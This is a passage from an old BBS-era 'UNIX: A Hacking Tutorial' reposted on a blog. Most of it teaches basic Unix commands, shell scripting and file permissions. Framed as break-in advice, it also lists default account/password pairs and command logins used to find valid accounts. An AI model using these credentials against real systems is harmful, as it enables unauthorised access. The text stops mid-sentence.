City, Prov.: ____________________________ Postal Code ____________<br />
<br />
Phone (with area code): ___________________________________________<br />
<br />
<br />
Title or Position, or interest in computer security:<br />
<br />
_____________________________________________________<br />
<br />
_____________________________________________________<br />
<br />
.<br />
Downloaded From P-80 International Information Systems 304-744-2253Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-83358851716830543712010-07-26T01:02:00.000+07:002010-07-26T01:03:23.905+07:00Unix Hcking Tutorial+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++<br />
+ UNIX : A Hacking Tutorial +<br />
+ TRF +<br />
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++<br />
<br />
----------------------<br />
o Intent of this file:<br />
----------------------<br />
<br />
This phile is geared as an UNIX tutorial at first, to let you get more<br />
familiar with the operating system. UNIX is just an operating system, as<br />
is MS-DOS, AppleDOS, AmigaDOS, and others. UNIX happens to be a multi-user-<br />
multi-tasking system, thus bringing a need for security not found on MSDOS,<br />
AppleDOS, etc. This phile will hopefully teach the beginners who do not have<br />
a clue about how to use UNIX a good start, and may hopefully teach old pros<br />
something they didn't know before. This file deals with UNIX SYSTEM V and<br />
its variants. When I talk about unix, its usually about SYSTEM V (rel 3.2).<br />
<br />
Where Can I be found? I have no Idea. The Boards today are going Up'n'Down<br />
so fast, 3 days after you read this file, if I put a BBS in it where you could<br />
reach me, it may be down! Just look for me.<br />
<br />
I can be reached on DarkWood Castle [If it goes back up], but that board<br />
is hard to get access on, but I decided to mention it anyway.<br />
<br />
I *COULD* Have been reached on jolnet, but......<br />
<br />
This file may have some bad spelling, etc, or discrepencies since it was<br />
spread out over a long time of writing, because of school, work, Girl friend,<br />
etc. Please, no flames. If you don't like this file, don't keep it.<br />
<br />
This is distributed under PHAZE Inc. Here are the members (and ex ones)<br />
The Dark Pawn<br />
The Data Wizard<br />
Sir Hackalot (Me)<br />
Taxi (ummm.. Busted)<br />
Lancia (Busted)<br />
The British Knight (Busted)<br />
The Living Pharoah (Busted)<br />
<br />
_____________________________________________________________________________<br />
<br />
<br />
-------------<br />
o Dedication:<br />
-------------<br />
This phile is dedicated to the members of LOD that were raided in<br />
Atlanta. The members that got busted were very good hackers, especially<br />
The Prophet. Good luck to you guys, and I hope you show up again somewhere.<br />
_____________________________________________________________________________<br />
<br />
------------------------<br />
o A little History, etc:<br />
------------------------<br />
<br />
UNIX, of course, was invented By AT&T in the 60's somewhere, to be<br />
"a programmer's operating system." While that goal was probably not reached<br />
when they first invented UNIX, it seems that now, UNIX is a programmer's OS.<br />
UNIX, as I have said before, is a multi-tasking/multi-user OS. It is also<br />
written in C, or at least large parts of it are, thus making it a portable<br />
operating system. We know that MSDOS corresponds to IBM/clone machines,<br />
right? Well, this is not the case with UNIX. We do not associate it with<br />
any one computer since it has been adapted for many, and there are many<br />
UNIX variants [that is, UNIX modified by a vendor, or such]. Some AT&T<br />
computers run it, and also some run MSDOS [AT&T 6300]. The SUN workstations<br />
run SunOS, a UNIX variant, and some VAX computers run Ultrix, a VAX version<br />
of UNIX. Remember, no matter what the name of the operating system is [BSD,<br />
UNIX,SunOS,Ultrix,Xenix, etc.], they still have a lot in common, such as the<br />
commands the operating system uses. Some variants may have features others<br />
do not, but they are basically similar in that they have a lot of the same<br />
commands/datafiles. When someone tries to tell you that UNIX goes along with<br />
a certain type of computer, they may be right, but remember, some computers<br />
have more than one Operating system. For instance, one person may tell you<br />
that UNIX is to a VAX as MSDOS is to IBM/clones. That is untrue, and the<br />
only reason I stated that, was because I have seen many messages with info<br />
/comparisons in it like that, which confuse users when they see a VAX running<br />
VMS.<br />
____________________________________________________________________________<br />
<br />
<br />
-------------------------------<br />
o Identifying a Unix/Logging in<br />
-------------------------------<br />
<br />
From now on, I will be referring to all the UNIX variants/etc as<br />
UNIX, so when I say something about UNIX, it generally means all the variants<br />
(Unix System V variants that is: BSD, SunOS, Ultrix, Xenix, etc.), unless<br />
I state a variant in particular.<br />
<br />
Okay. Now its time for me to tell you how a unix USUALLY greets you.<br />
First, when you call up a UNIX, or connect to one however you do, you will<br />
usually get this prompt:<br />
<br />
login:<br />
<br />
Ok. Thats all fine and dandy. That means that this is PROBABLY a Unix,<br />
although there are BBS's that can mimic the login procedure of an OS<br />
(Operating System), thus making some people believe its a Unix. [Hah!].<br />
Some Unixes will tell you what they are or give you a message before a<br />
login: prompt, as such:<br />
<br />
Welcome to SHUnix. Please log in.<br />
<br />
login:<br />
<br />
Or something like that. Public access Unixes [like Public BBSs] will<br />
tell you how to logon if you are a new users. Unfortunatly, this phile is<br />
not about public access Unixes, but I will talk about them briefly later, as<br />
a UUCP/UseNet/Bitnet address for mail.<br />
OK. You've gotten to the login prompt! Now, what you need to do<br />
here is enter in a valid account. An Account usually consists of 8 characters<br />
or less. After you enter in an account, you will probably get a password<br />
prompt of some sort. The prompts may vary, as the source code to the login<br />
program is usually supplied with UNIX, or is readily available for free.<br />
Well, The easiest thing I can say to do to login is basically this:<br />
Get an account, or try the defaults. The defaults are ones that came with<br />
the operating system, in standard form. The list of some of the Defaults<br />
are as follows:<br />
<br />
ACCOUNT PASSWORD<br />
------- --------<br />
root root - Rarely open to hackers<br />
sys sys / system / bin<br />
bin sys / bin<br />
mountfsys mountfsys<br />
adm adm<br />
uucp uucp<br />
nuucp anon<br />
anon anon<br />
user user<br />
games games<br />
install install<br />
reboot * See Below<br />
demo demo<br />
umountfsys umountfsys<br />
sync sync<br />
admin admin<br />
guest guest<br />
daemon daemon<br />
<br />
The accounts root, mountfsys, umountfsys, install, and sometimes sync are<br />
root level accounts, meaning they have sysop power, or total power. Other<br />
logins are just "user level" logins meaning they only have power over what<br />
files/processes they own. I'll get into that later, in the file permissions<br />
section. The REBOOT login is what as known as a command login, which just<br />
simply doesn't let you into the operating system, but executes a program<br />
assigned to it. It usually does just what it says, reboot the system. It<br />
may not be standard on all UNIX systems, but I have seen it on UNISYS unixes<br />
and also HP/UX systems [Hewlett Packard Unixes]. So far, these accounts have<br />
not been passworded [reboot], which is real stupid, if you ask me.<br />
<br />
COMMAND LOGINS:<br />
---------------<br />
<br />
There are "command logins", which, like reboot, execute a command then log<br />
you off instead of letting you use the command interpreter. BSD is notorious<br />
for having these, and concequently, so does MIT's computers. Here are some:<br />
<br />
rwho - show who is online<br />
finger - same<br />
who - same<br />
<br />
These are the most useful, since they will give the account names that are<br />
online, thus showing you several accounts that actually exist.<br />
<br />
<br />
Errors:<br />
-------<br />
<br />
When you get an invalid Account name / invalid password, or both, you will<br />
get some kind of error. Usually it is the "login incorrect" message. When<br />
the computer tells you that, you have done something wrong by either enterring<br />
an invalid account name, or a valid account name, but invalid password. It<br />
does not tell you which mistake you made, for obvious reasons. Also,<br />
when you login incorrectly, the error log on the system gets updated, letting<br />
the sysops(s) know something is amiss.<br />
<br />
Another error is "Cannot change to home directory" or "Cannot Change<br />
Directory." This means that no "home directory" which is essentially the<br />
'root' directory for an account, which is the directory you start off in.<br />
On DOS, you start in A:\ or C:\ or whatever, but in UNIX you start in<br />
/homedirectory. [Note: The / is used in directories on UNIX, not a \ ].<br />
Most systems will log you off after this, but some tell you that they will<br />
put you in the root directory [ '/'].<br />
<br />
Another error is "No Shell". This means that no "shell" was defined<br />
for that particular account. The "shell" will be explained later. Some<br />
systems will log you off after this message. Others will tell you that they<br />
will use the regular shell, by saying "Using the bourne shell", or "Using sh"<br />
<br />
-----------------------------<br />
Accounts In General :<br />
-----------------------------<br />
<br />
This section is to hopefully describe to you the user structure<br />
in the UNIX environment.<br />
Ok, think of UNIX having two levels of security: absolute power,<br />
or just a regular user. The ones that have absolute power are those users<br />
at the root level. Ok, now is the time to think in numbers. Unix associates<br />
numbers with account names. each account will have a number. Some will have<br />
the same number. That number is the UID [user-id] of the account. the root<br />
user id is 0. Any account that has a user id of 0 will have root access.<br />
Unix does not deal with account names (logins) but rather the number<br />
associated with them. for instance, If my user-id is 50, and someone else's<br />
is 50, with both have absolute power of each other, but no-one else.<br />
_____________________________________________________________________________<br />
<br />
---------------<br />
Shells :<br />
---------------<br />
<br />
A shell is an executable program which loads and runs when a user<br />
logs on, and is in the foreground. This "shell" can be any executable prog-<br />
ram, and it is defined in the "passwd" file which is the userfile. Each<br />
login can have a unique "shell". Ok. Now the shell that we usually will work<br />
with is a command interpreter. A command interpreter is simply something<br />
like MSDOS's COMMAND.COM, which processes commands, and sends them to the<br />
kernel [operating system]. A shell can be anything, as I said before,<br />
but the one you want to have is a command interpreter. Here are the<br />
usual shells you will find:<br />
<br />
sh - This is the bourne shell. It is your basic Unix "COMMAND.COM". It has<br />
a "script" language, as do most of the command interpreters on Unix sys-<br />
tems.<br />
<br />
csh - This is the "C" shell, which will allow you to enter "C" like commands.<br />
ksh - this is the korn shell. Just another command interpreter.<br />
tcsh - this is one, which is used at MIT I believe. Allows command editing.<br />
vsh - visual shell. It is a menu driven deal. Sorta like.. Windows for DOS<br />
rsh - restricted shell OR remote shell. Both Explained later.<br />
There are many others, including "homemade " shells, which are<br />
programs written by the owner of a unix, or for a specific unix, and they<br />
are not standard. Remember, the shell is just the program you get to use<br />
and when it is done executing, you get logged off. A good example of a<br />
homemade shell is on Eskimo North, a public access Unix. The shell<br />
is called "Esh", and it is just something like a one-key-press BBS,<br />
but hey, its still a shell. The Number to eskimo north is 206-387-3637.<br />
[206-For-Ever]. If you call there, send Glitch Lots of mail.<br />
Several companies use Word Processors, databases, and other things<br />
as a user shell, to prevent abuse, and make life easier for unskilled computer<br />
operators. Several Medical Hospitals use this kind of shell in Georgia,<br />
and fortunatly, these second rate programs leave major holes in Unix.<br />
Also, a BBS can be run as a shell. Check out Jolnet [312]-301-2100, they<br />
give you a choice between a command interpreter, or a BBS as a shell.<br />
WHen you have a command interpreter, the prompt is usually a:<br />
$<br />
when you are a root user the prompt is usually a:<br />
#<br />
The variable, PS1, can be set to hold a prompt.<br />
For instance, if PS1 is "HI:", your prompt will be:<br />
HI:<br />
<br />
_____________________________________________________________________________<br />
<br />
------------------------<br />
SPecial Characters, ETc:<br />
------------------------<br />
<br />
Control-D : End of file. When using mail or a text editor, this will end<br />
the message or text file. If you are in the shell and hit control-d you get<br />
logged off.<br />
<br />
Control-J: On some systems, this is like the enter key.<br />
@ : Is sometimes a "null"<br />
? : This is a wildcard. This can represent a letter. If you specified<br />
something at the command line like "b?b" Unix would look for bob,bib,bub,<br />
and every other letter/number between a-z, 0-9.<br />
* : this can represent any number of characters. If you specified a "hi*"<br />
it would use "hit", him, hiiii, hiya, and ANYTHING that starts with<br />
hi. "H*l" could by hill, hull, hl, and anything that starts with an<br />
H and ends with an L.<br />
<br />
[] - The specifies a range. if i did b[o,u,i]b unix would think: bib,bub,bob<br />
if i did: b[a-d]b unix would think: bab,bbb,bcb,bdb. Get the idea? The<br />
[], ?, and * are usually used with copy, deleting files, and directory<br />
listings.<br />
<br />
EVERYTHING in Unix is CASE sensitive. This means "Hill" and "hill" are not<br />
the same thing. This allows for many files to be able to be stored, since<br />
"Hill" "hill" "hIll" "hiLl", etc. can be different files. So, when using<br />
the [] stuff, you have to specify capital letters if any files you are dealing<br />
with has capital letters. Most everything is lower case though.<br />
<br />
----------------<br />
Commands to use:<br />
----------------<br />
<br />
Now, I will rundown some of the useful commands of Unix. I will act<br />
as if I were typing in the actual command from a prompt.<br />
<br />
ls - this is to get a directory. With no arguments, it will just print out<br />
file names in either one column or multi-column output, depending on the<br />
ls program you have access to.<br />
<br />
example:<br />
$ ls<br />
hithere<br />
runme<br />
note.text<br />
src<br />
$<br />
the -l switch will give you extended info on the files.<br />
$ ls -l<br />
rwx--x--x sirhack sirh 10990 runme<br />
and so on....<br />
<br />
the "rwx--x--x" is the file permission. [Explained Later]<br />
the "sirhack sirh" is the owner of the file/group the file is in.<br />
sirhack = owner, sirh = user-group the file is in [explained later]<br />
the 10990 is the size of the file in bytes.<br />
"runme" is the file name.<br />
The format varies, but you should have the general idea.<br />
<br />
cat - this types out a file onto the screen. should be used on text files.<br />
only use it with binary files to make a user mad [explained later]<br />
ex:<br />
$ cat note.txt<br />
This is a sample text file!<br />
$<br />
<br />
cd - change directory . You do it like this: cd /dir/dir1/dir2/dirn.<br />
the dir1/etc.... describes the directory name. Say I want to get<br />
to the root directory.<br />
ex:<br />
$ cd /<br />
*ok, I'm there.*<br />
$ ls<br />
bin<br />
sys<br />
etc<br />
temp<br />
work<br />
usr<br />
all of the above are directories, lets say.<br />
$ cd /usr<br />
$ ls<br />
sirhack<br />
datawiz<br />
prophet<br />
src<br />
violence<br />
par<br />
phiber<br />
scythian<br />
$ cd /usr/sirhack<br />
$ ls<br />
hithere<br />
runme<br />
note.text<br />
src<br />
$<br />
ok, now, you do not have to enter the full dir name. if you are in<br />
a directory, and want to get into one that is right there [say "src"], you<br />
can type "cd src" [no "/"]. Instead of typing "cd /usr/sirhack/src" from the<br />
sirhack dir, you can type "cd src"<br />
<br />
cp - this copies a file. syntax for it is "cp fromfile tofile"<br />
$ cp runme runme2<br />
$ ls<br />
hithere<br />
runme<br />
note.text<br />
src<br />
runme2<br />
Full pathnames can be included, as to copy it to another directory.<br />
$ cp runme /usr/datwiz/runme<br />
<br />
mv - this renames a file. syntax "mv oldname newname"<br />
$ mv runme2 runit<br />
$ ls<br />
hithere<br />
runme<br />
note.text<br />
src<br />
runit<br />
files can be renamed into other directories.<br />
$ mv runit /usr/datwiz/run<br />
$ ls<br />
hithere<br />
runme<br />
note.text<br />
src<br />
$ ls /usr/datwiz<br />
runme<br />
run<br />
<br />
pwd - gives current directory<br />
$ pwd<br />
/usr/sirhack<br />
$ cd src<br />
$ pwd<br />
/usr/sirhack/src<br />
$ cd ..<br />
$ pwd<br />
/usr/sirhack<br />
[ the ".." means use the name one directory back. ]<br />
$ cd ../datwiz<br />
[translates to cd /usr/datwiz]<br />
$ pwd<br />
/usr/datwiz<br />
$ cd $home<br />
[goto home dir]<br />
$ pwd<br />
/usr/sirhack<br />
<br />
rm - delete a file. syntax "rm filename" or "rm -r directory name"<br />
$ rm note.text<br />
$ ls<br />
hithere<br />
runme<br />
src<br />
$<br />
<br />
write - chat with another user. Well, "write" to another user.<br />
syntax: "write username"<br />
$ write scythian<br />
scythian has been notified<br />
Hey Scy! What up??<br />
Message from scythian on tty001 at 17:32<br />
hey!<br />
me: So, hows life?<br />
scy: ok, I guess.<br />
me: gotta go finish this text file.<br />
scy: ok<br />
me: control-D [to exit program]<br />
$<br />
<br />
who [w,who,whodo] - print who is online<br />
$ who<br />
login term logontime<br />
scythian + tty001 17:20<br />
phiberO + tty002 15:50<br />
sirhack + tty003 17:21<br />
datawiz - tty004 11:20<br />
glitch - tty666 66:60<br />
$<br />
the "who" commands may vary in the information given. a "+" means<br />
you can "write" to their terminal, a "-" means you cannot.<br />
<br />
man - show a manual page entry. syntax "man command name" This is a help<br />
program. If you wanted to know how to use... "who" you'd type<br />
$ man who<br />
WHO(1) xxx......<br />
and it would tell you.<br />
<br />
stty - set your terminal characteristics. You WILL have to do "man stty"<br />
since each stty is different, it seems like.<br />
an example would be:<br />
$ stty -parenb<br />
to make the data params N,8,1. A lot of Unixes operate at<br />
e,7,1 by default.<br />
<br />
sz,rz - send and recieve via zmodem<br />
rx,sx - send / recieve via xmodem<br />
rb,sb - send via batch ymodem. These 6 programs may or may not be on a unix.<br />
umodem - send/recieve via umodem.<br />
$ sz filename<br />
ready to send...<br />
$ rz filename<br />
please send your file....<br />
...etc..<br />
<br />
ed - text editor. Usage "ed filename" to create a file that doesn't<br />
exist, just enter in "ed filename"<br />
some versions of ed will give you a prompt, such as "*" others will not<br />
$ ed newtext<br />
0<br />
* a<br />
This is line 1<br />
This is line 2<br />
[control-z]<br />
* 1 [to see line one]<br />
This is line 1<br />
* a [keep adding]<br />
This is line 3<br />
[control-z]<br />
*0a [add after line 0]<br />
This is THE first line<br />
[control-z]<br />
1,4l<br />
This is THE first line<br />
This is line 1<br />
This is line 2<br />
This is line 3<br />
* w<br />
71<br />
* q<br />
$<br />
The 71 is number of bytes written.<br />
a = append<br />
l = list<br />
# = print line number<br />
w - write<br />
l fname = load fname<br />
s fname = save to fname<br />
w = write to current file<br />
q = quit<br />
mesg - turn write permissions on or off to your terminal (allow chat)<br />
format "mesg y" or "mesg n"<br />
cc - the C compiler. don't worry about this one right now.<br />
chmod - change mode of a file. Change the access in other words.<br />
syntax: "chmod mode filename"<br />
$ chmod a+r newtext<br />
Now everyone can read newtext.<br />
a = all<br />
r = read. This will be explained further in the File System section.<br />
<br />
chown - change the owner of a file.<br />
syntax: "chown owner filename"<br />
$ chown scythian newtext<br />
$<br />
chgrp - change the group [explained later] of a file.<br />
syntax: "chgrp group file"<br />
$ chgrp root runme<br />
$<br />
finger - print out basic info on an account. Format: finger username<br />
grep - search for patterns in a file. syntax: "grep pattern file"<br />
$ grep 1 newtext<br />
This is Line 1<br />
$ grep THE newtext<br />
This is THE first line<br />
$ grep "THE line 1" newtext<br />
$<br />
<br />
mail - This is a very useful utility. Obviously, you already know what it<br />
is by its name. There are several MAIL utilities, such as ELM, MUSH<br />
and MSH, but the basic "mail" program is called "mail". The usage<br />
is:<br />
"mail username@address" or<br />
"mail username"<br />
or<br />
"mail"<br />
or "mail addr1!addr2!addr3!user"<br />
<br />
"mail username@address" - This is used to send mail to someone on<br />
another system, which is usually another UNIX, but some DOS machines and some<br />
VAX machines can recieve Unix Mail. When you use "mail user@address" the<br />
system you are on MUST have a "smart mailer" [known as smail], and must<br />
have what we call system maps. The smart mailer will find the "adress" part<br />
of the command and expand it into the full pathname usually. I could look<br />
like this: mail phiber@optik<br />
then look like this to the computer:<br />
<br />
mail sys1!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber<br />
<br />
Do not worry about it, I was merely explaining the principal of the thing.<br />
Now, if there is no smart mailer online, you'll have to know the FULL path<br />
name of the person you wish to mail to. For Instance, I want to mail to<br />
.. phiber. I'd do this if there were no smart mailer:<br />
<br />
$ mail sys!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber<br />
<br />
Hey Guy. Whats up? Well, gotta go. Nice long message huh?<br />
[control-D]<br />
$<br />
Then, when he got it, there would be about 20 lines of information, with<br />
like a post mark from every system my message went thru, and the "from" line<br />
would look like so:<br />
<br />
From optik!sirhacksys!att.com!sc1!sbell!pacbell!unisys!sys!sirhack <sir hack=""><br />
<br />
Now, for local mailing, just type in "mail username" where username<br />
is the login you want to send mail to. Then type in your message. Then<br />
end it with a control-D.<br />
<br />
To read YOUR mail, just type in mail. IE:<br />
<br />
$ mail<br />
<br />
From scythian ............<br />
To sirhack ............<br />
Subject: Well....<br />
<br />
Arghhh!<br />
<br />
?<br />
The dots represent omitted crap. Each Mail program makes its own headings.<br />
That ? is a prompt. At this prompt I can type:<br />
<br />
d - delete<br />
f username - forward to username<br />
w fname - write message to a file named fname<br />
s fname - save message with header into file<br />
q - quit / update mail<br />
x - quit, but don't change a thing<br />
m username - mail to username<br />
r - reply<br />
[enter] - read next message<br />
+ - go forward one message<br />
- : go back one<br />
h - print out message headers that are in your mailbox.<br />
<br />
There are others, to see them, you'd usually hit '?'.<br />
<br />
--------<br />
<br />
If you send mail to someone not on your system, you will have to wait longer<br />
for a reply, since it is just as a letter. A "postman" has to pick it up.<br />
The system might call out, and use UUCP to transfer mail. Usually, uucp<br />
accounts are no good to one, unless you have uucp available to intercept mail.<br />
<br />
ps - process. This command allows you to see what you are actually doing<br />
in memory. Everytime you run a program, it gets assigned a Process Id number<br />
(PID), for accounting purposes, and so it can be tracked in memory, as<br />
well as shut down by you, or root. usually, the first thing in a process<br />
list given by "ps" is your shell name. Say I was logged in under sirhack,<br />
using the shell "csh" and running "watch scythian". The watch program would<br />
go into the background, meaning I'd still be able to do things while it was<br />
running:<br />
$ ps<br />
PID TTY NAME<br />
122 001 ksh<br />
123 001 watch<br />
$<br />
That is a shortened PS. That is the default listing [a brief one].<br />
The TTY column represents the "tty" [i/o device] that the process is being<br />
run from. This is only useful really if you are using layers (don't worry)<br />
or more than one person is logged in with the same account name. Now,<br />
"ps -f" would give a full process listing on yourself, so instead of<br />
seeing just plain ole "watch" you'd most likely see "watch scythian"<br />
<br />
kill - kill a process. This is used to terminate a program in memory obvio-<br />
ously. You can only kill processes you own [ones you started], unless you<br />
are root, or your EUID is the same as the process you want to kill.<br />
(Will explain euid later). If you kill the shell process, you are logged<br />
off. By the same token, if you kill someone else's shell process, they<br />
are logged off. So, if I said "kill 122" I would be logged off. However,<br />
kill only sends a signal to UNIX telling it to kill off a process. If<br />
you just use the syntax "kill pid" then UNIX kills the process WHEN it feels<br />
like it, which may be never. So, you can specify urgency! Try "kill -num pid"<br />
Kill -9 pid is a definite kill almost instantly. So if I did this:<br />
$ kill 122<br />
$ kill 123<br />
$ ps<br />
PID TTY NAME<br />
122 001 ksh<br />
123 001 watch<br />
$ kill -9 123<br />
[123]: killed<br />
$ kill -9 122<br />
garbage<br />
NO CARRIER<br />
<br />
Also, you can do "kill -1 0" to kill your shell process to log yourself off.<br />
This is useful in scripts (explained later).<br />
<br />
-------------------<br />
Shell Programmin'<br />
-------------------<br />
<br />
Shell Programming is basically making a "script" file for the<br />
standard shell, being sh, ksh, csh, or something on those lines. Its<br />
like an MSDOS batch file, but more complex, and more Flexible.<br />
This can be useful in one aspect of hacking.<br />
<br />
<br />
First, lets get into variables. Variables obviously can be assigned<br />
values. These values can be string values, or numberic values.<br />
<br />
number=1<br />
<br />
That would assign 1 to the variable named "number".<br />
<br />
string=Hi There<br />
or<br />
string="Hi There"<br />
<br />
Both would assign "Hi there" to a variable.<br />
<br />
Using a variable is different though. When you wish to use a variable<br />
you must procede it with a dollar ($) sign. These variables can<br />
be used as arguments in programs. When I said that scripts are<br />
like batch files, I meant it. You can enter in any name of a program<br />
in a script file, and it will execute it. Here is a sample script.<br />
<br />
counter=1<br />
arg1="-uf"<br />
arg2="scythian"<br />
<br />
ps $arg1 $arg2<br />
<br />
echo $counter<br />
<br />
That script would translate to "ps -uf scythian" then would print<br />
"1" after that was finished. ECHO prints something on the screen<br />
whether it be numeric, or a string constant.<br />
<br />
Other Commands / Examples:<br />
<br />
read - reads someting into a variable. format : read variable . No dollar<br />
sign is needed here! If I wwanted to get someone's name, I could<br />
put:<br />
<br />
echo "What is your name?"<br />
read hisname<br />
echo Hello $hisname<br />
<br />
What is your name?<br />
Sir Hackalot<br />
Hello Sir Hackalot<br />
<br />
Remember, read can read numeric values also.<br />
<br />
trap - This can watch for someone to use the interrupt character. (Ctrl-c)<br />
format: trap "command ; command ; command ; etc.."<br />
Example:<br />
trap "echo 'Noway!! You are not getting rid o me that easy' ; echo<br />
'You gotta see this through!'"<br />
<br />
Now, if I hit control-c during the script after this statement was<br />
executed, I'd get:<br />
Noway!! You are not getting rid of me that easy<br />
You gotta see this through!<br />
<br />
exit : format :exit [num] This exists the shell [quits] with return<br />
code of num.<br />
<br />
-----<br />
CASE<br />
-----<br />
<br />
Case execution is like a menu choice deal. The format of the command<br />
or structure is :<br />
case variable in<br />
1) command;<br />
command;;<br />
2) command;<br />
command;<br />
command;;<br />
*) command;;<br />
esac<br />
Each part can have any number of commands. The last command however<br />
must have a ";;". Take this menu:<br />
<br />
echo "Please Choose:"<br />
echo "(D)irectory (L)ogoff (S)hell"<br />
read choice<br />
case $choice in<br />
<br />
D) echo "Doing Directory...";<br />
ls -al ;;<br />
L) echo Bye;<br />
kill -1 0;;<br />
S) exit;;<br />
*) Echo "Error! Not a command";;<br />
esac<br />
<br />
The esac marks the end of a case function. It must be after the<br />
LAST command.<br />
<br />
Loops<br />
-----<br />
<br />
Ok, loops. There are two loop functins. the for loops, and the<br />
repeat.<br />
<br />
repeat looks like this: repeat something somethin1 somethin2<br />
this would repeat a section of your script for each "something".<br />
say i did this:<br />
repeat scythian sirhack prophet<br />
<br />
I may see "scythian" then sirhack then prophet on my screen.<br />
<br />
The for loop is defined as "for variable in something<br />
do<br />
..<br />
..<br />
done"<br />
<br />
an example:<br />
for counter in 1 2 3<br />
do<br />
echo $counter<br />
done<br />
<br />
That would print out 1 then 2 then 3.<br />
<br />
Using TEST<br />
----------<br />
The format: Test variable option variable<br />
<br />
The optios are:<br />
-eq =<br />
-ne <> (not equal)<br />
-gt ><br />
-lt <<br />
-ge >=<br />
-le <=<br />
<br />
for strings its: = for equal != for not equal.<br />
<br />
If the condition is true, a zero is returned. Watch:<br />
<br />
test 3 -eq 3<br />
<br />
that would be test 3 = 3, and 0 would be returned.<br />
<br />
EXPR<br />
----<br />
<br />
This is for numeric functions. You cannot simply type in<br />
echo 4 + 5<br />
and get an answer most of the time. you must say:<br />
expr variable [or number] operator variable2 [or number]<br />
the operators are:<br />
<br />
+ add<br />
- subtract<br />
* multiply<br />
/ divide<br />
^ - power (on some systems)<br />
<br />
example : expr 4 + 5<br />
var = expr 4 + 5<br />
var would hold 9.<br />
<br />
On some systems, expr sometimes prints out a formula. I mean,<br />
22+12 is not the same as 22 + 12. If you said expr 22+12 you<br />
would see:<br />
22+12<br />
If you did expr 22 + 12 you'd see:<br />
34<br />
<br />
<br />
SYSTEM VARIABLES<br />
----------------<br />
<br />
These are variables used by the shell, and are usually set in the<br />
system wide .profile [explained later].<br />
<br />
HOME - location of your home directory.<br />
PS1 - The prompt you are given. usually $ . On BSD its usually &<br />
PATH - This is the search path for programs. When you type in a program<br />
to be run, it is not in memory; it must be loaded off disk. Most commands<br />
are not in Memory like MSDOS. If a program is on the search path, it may<br />
be executed no matter where you are. If not, you must be in the directory<br />
where the program is. A path is a set of directories basically, seperated by<br />
":"'s. Here is a typical search path:<br />
<br />
:/bin:/etc:/usr/lbin:$HOME:<br />
<br />
When you tried to execute a program, Unix would look for it in /bin,<br />
/etc, /usr/lbin, and your home directory, and if its not found, an error is<br />
spewed out. It searches directories in ORDER of the path. SO if you had a<br />
program named "sh" in your home directory, and typed in "sh", EVEN if<br />
you were in your home dir, it would execute the one in /bin. So, you<br />
must set your paths wisely. Public access Unixes do this for you, but systems<br />
you may encounter may have no path set.<br />
<br />
TERM - This is your terminal type. UNIX has a library of functions called<br />
"CURSES" which can take advantage of any terminal, provided the escape<br />
codes are found. You must have your term set to something if you run<br />
screen oriented programs. The escape codes/names of terms are found<br />
in a file called TERMCAP. Don't worry about that. just set your term<br />
to ansi or vt100. CURSES will let you know if it cannot manipulate your<br />
terminal emulation.<br />
<br />
<br />
-------------------<br />
The C compiler<br />
-------------------<br />
<br />
This Will be BRIEF. Why? Becuase if you want to learn C, go<br />
buy a book. I don't have time to write another text file on<br />
C, for it would be huge. Basically, most executables are programmed<br />
in C. Source code files on unix are found as filename.c .<br />
To compile one, type in "cc filename.c". Not all C programs<br />
will compile, since they may depend on other files not there, or<br />
are just modules. If you see a think called "makefile" you can<br />
usually type in just "make" at the command prompt, and something<br />
will be compiled, or be attempted to compile. When using make or<br />
CC, it would be wise to use the background operand since<br />
compiling sometimes takes for ever.<br />
IE:<br />
$ cc login.c&<br />
[1234]<br />
$<br />
(The 1234 was the process # it got identified as).<br />
<br />
<br />
_____________________________________________________________________________<br />
<br />
---------------<br />
The FILE SYSTEM<br />
---------------<br />
<br />
This is an instrumental part of UNIX. If you do not understand this<br />
section, you'll never get the hang of hacking Unix, since a lot of Pranks<br />
you can play, and things you can do to "raise your access" depend on it.<br />
<br />
First, Let's start out by talking about the directory structure. It is<br />
basically a Hiearchy file system, meaning, it starts out at a root directory<br />
and expands, just as MSDOS, and possibly AmigaDos.<br />
<br />
Here is a Directory Tree of sorts: (d) means directory<br />
<br />
/ (root dir)<br />
|<br />
|--------------------|<br />
bin (d) usr (d)<br />
----^--------------------<br />
| | |<br />
sirhack(d) scythian (d) prophet (d)<br />
|<br />
src (d)<br />
<br />
Now, this particular system contains the following directories:<br />
/<br />
/bin<br />
/usr<br />
/usr/sirhack<br />
/usr/sirhack/src<br />
/usr/scythian<br />
/usr/prophet<br />
<br />
Hopefully, you understood that part, and you should. Everything spawns from<br />
the root directory.<br />
<br />
o File Permissions!<br />
------------------<br />
<br />
Now, this is really the biggie. File Permissions. It is not that hard to<br />
understand file permissions, but I will explain them deeply anyway.<br />
<br />
OK, now you must think of user groups as well as user names. Everyone<br />
belongs to a group. at the $ prompt, you could type in 'id' to see what<br />
group you are in. Ok, groups are used to allow people access certain things,<br />
instead of just having one person controlling/having access to certain files.<br />
Remember also, that Unix looks at someone's UID to determine access, not<br />
user name.<br />
<br />
Ok. File permissions are not really that complicated. Each file has an owner<br />
This OWNER is usually the one who creates the file, either by copying a file<br />
or just by plain editing one. The program CHOWN can be used to give someone<br />
ownership of a file. Remember that the owner of a file must be the one who<br />
runs CHOWN, since he is the only one that can change the permissions of a file<br />
Also, there is a group owner, which is basically the group that you were in<br />
when the file was created. You would use chgrp to change the group a file is<br />
in.<br />
<br />
Now, Files can have Execute permissions, read permissions, or write permission.<br />
If you have execute permission, you know that you can just type in the name<br />
of that program at the command line, and it will execute. If you have read<br />
permission on a file, you can obviously read the file, or do anything that<br />
reads the file in, such as copying the file or cat[ing] it (Typing it).<br />
If you do NOT have access to read a file, you can't do anything that requires<br />
reading in the file. This is the same respect with write permission. Now,<br />
all the permissions are arranged into 3 groups. The first is the owner's<br />
permissions. He may have the permissions set for himself to read and execute<br />
the file, but not write to it. This would keep him from deleting it.<br />
The second group is the group permissions. Take an elongated directory<br />
for an example:<br />
$ ls -l runme<br />
r-xrwxr-- sirhack root 10990 March 21 runme<br />
<br />
ok. Now, "root" is the groupname this file is in. "sirhack" is the owner.<br />
Now, if the group named 'root' has access to read, write and execute, they<br />
could do just that. Say .. Scythian came across the file, and was in the root<br />
user group. He could read write or execute the file. Now, say datawiz came<br />
